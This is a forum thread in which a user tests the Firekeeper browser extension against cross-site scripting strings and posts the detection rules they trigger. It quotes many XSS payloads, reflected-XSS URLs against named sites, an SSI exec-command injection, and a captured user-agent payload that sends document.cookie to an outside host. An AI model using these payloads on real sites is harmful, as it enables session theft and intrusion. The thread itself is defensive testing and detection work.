Put your firekeeper extension to the test with XSS and learn by the process...

[polonus]

Hi malware fighters,

Here we have some malscript codes, that are being flagged by Firekeeper in the Mozilla browser.
Sometimes when you find code online, it is a good policy to feed it into the Google search engine and see if firekeeper alert and flags the exploit attempts. In this process one learns about malcode and to what purpose it is abused, to detect it better and be better protected against it.
I give you two examples:

I give them with their alerts:
1

Code: [Select]

%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28d script alert 'Name or service not known'
part of === Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
&
2

Code: [Select]

%22%3E%3C%2Fscript%3E%3Cscript%3Eal=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
A description of the use of the second exploit one could find described here:
http://www.ernw.de/content/e6/e179/index_ger.html
and here: http://www.xssed.com/mirror/23934/

Very interesting read here: http://www.pointblanksecurity.com/xss/

polonus

[polonus]

Hi malware fighters,

Now the following one has not flagged anything with Firekeeper:

Code: [Select]

<script>alert(document.location)</script>
XSS Example: PHPnuke
Reflected attack
Requires social engineeringhttp://www.phpnuke.org/user.php?op=userinfo&uname=&lt;script&gt;alert(document.cookie);&lt;/script&gt;

polonus

[Asyn]

It's all about learning and knowledge, trying to keep the pace of the bad guys...
asyn

[polonus]

Hi malware fighters,

See what your User Agent reveals: http://useragentstring.com/Googlebot2.1_id_1697.php
But as I pose with User Agent Switcher, it is shown when analyzed:
http://useragentstring.com/Googlebot2.1_id_108.php
Giving in a script as User Agent (look with BotsvBrowsers) gives conflicting results and a tag from Lithuania:

Code: [Select]

<script>document.print('<img href=”http://55329.glrdmd.eu/admin/2.php?q='+document.cookie);</script>and this as URL: http://55329.glrdmd.eu/admin/2.php?q=\'   > http://www.botsvsbrowsers.com/details/158115/index.html
Enough to ponder on about, to analyze and to feel what goes on under the hood of your browser,
and also learn from our past: http://webaim.org/blog/user-agent-string-history/

polonus

[polonus]

Hi malware fighters,

Another couple of examples, where using the characters instead may fool the filters and allow XSS to work, some detection rules, and examples of fully decoded, where we used this tool to see what unpacked it has in store for us: http://www.strictly-software.com/unpack-javascript.aspx

For the fans I have attached the examples in a txt file,

polonus

[polonus]

Hi malware fighters,

Here was another interesting test-site: http://webblaze.org/dbates/

I give some examples of how it was flagged in my browser in the attached txt file, the rest of the testing can be done by users here that have firefox or flock with Firekeeper, NoScript and the Netcraft toolbar installed, they should nip all these attempts in the bud,

polonus

[polonus]

Hi malware fighters,

A very nice article about the threat of XSS vulnerabilities on a website is here:
http://blogs.apache.org/infra/entry/apache_org_04_09_2010
Every leak means a potential threat, when valuable information resides on a particular web site. The effect of an XSS-leak is directly related to the nature of that website (valuable data). For website owners input validation and the secure use of PHP, Perl, etc. are measures they should take against XSS, SQL-attacks and buffer overflows, the consumer can feel secure with NoScript active in the browser, the XSS attack will have ended before it has begun,

polonus

[polonus]

Hi malware fighters,

Here is another list that I tested against Firekeeper detection: http://labs.securitycompass.com/wp-content/uploads/xssme/xssme_extended_strings.xml

As an example one of then flagged as:
=== Triggered rule ===
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://api.search.yahoo.com/WebSearchService/V1/webSearch?appid=flock-search&query=%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCR%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27IPT+SRC%3Dhttp%3A%2F%2Fwww.securitycompass.com%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--&zip=&start=1&results=4&region=fr&fr=flo2

Resource: http://attackvectors.com/code/XSS.txt

polonus

[polonus]

Howdy malware fighters,

Another nice link here: http://www.sk-typo3.de/index.php?id=370
and another here: http://www.maht0x0r.net/library/computing/xssAttacks.html
dangerous strings: http://subversion.assembla.com/svn/telbook/trunk/vendors/dummydata/files/dangerous_strings.dat

One example of a rule flagged by Firekeeper:
=== Triggered rule ===
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://api.search.yahoo.com/WebSearchService/V1/webSearch?appid=flock-search&query=%3CDIV+STYLE%3D%22background-image%3A+url%28javascript%3Aalert%28%27XSS%27%29%29%22%3E&zip=&start=1&results=4&region=fr&fr=flo2

Click the above link and you will get an  XSS warning through the NoScript extension (if you have that installed)

About making up your own firekeeper rules: Firekeeper rules are made of two parts: Rule header and Rule options. The header defines three actions that can be taken whenever a rule match is detected: pass, drop, and alert. Whenever a 'pass' action rule match occurs, it allows processing of HTTP traffic without going for any further checks. Likewise, 'drop' action blocks all traffic without any user intervention, and 'alert' generates an Alert window.

The Rule options describe what should trigger an action and other information about the rule. There are three choices: url_content, headers_content, and body_content. Creating a rule is simple. open a text file and write

alert(msg: attack detected body_content:"clsid|3A"; nocase;)

In the body_content tag specify the content that you want to scan in the incoming traffic, and in the msg tag define the message that should be displayed when such content is detected. nocase tag signifies that the content specified in the body_content tag will be searched without any arguments,

polonus

[polonus]

Hi malware fighters,

Let us test again:

Code: [Select]

><script>alert(‘XSS') We get this alert with Firekeeper extension:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://www.google.com/search?client=flock&channel=fds&q=%3E%3Cscript%3Ealert%28%E2%80%98XSS%27%29&ie=utf-8&oe=utf-8&aq=t
The the Netcraft toolbar warns, if ignored, we get another Firekeeper warning:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://pmw90687.surfcanyon.com/queryReformulation?partner=wot&authCode=pmw90687&format=jsonp&callback=contentscript.callback1&q=%3E%3Cscript%3Ealert(%E2%80%98XSS%27)

Now we are going to see how this can be used as a browser agent here: http://www.botsvsbrowsers.com/details/187425/index.html
If we are to test the User Agent we again get a Firekeeper alert:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://www.botsvsbrowsers.com/SimulateUserAgent.asp?UserAgent=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E

Again we have to ignore several warnings, allow the request with NoScript and RequestPolicy extension and the webpage we request is shown as seen through this bot.
I ran a Fiddler session under it and here I like to stress the following: http://botsversusbrowsers.com/SimulateUserAgent.asp?UserAgent=%3CScript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E

If you like you can use it as a User Agent in User Agent Switcher an extension for Firefox and Flock browser. Sometimes this can also be a way to avoid browser bugs,

polonus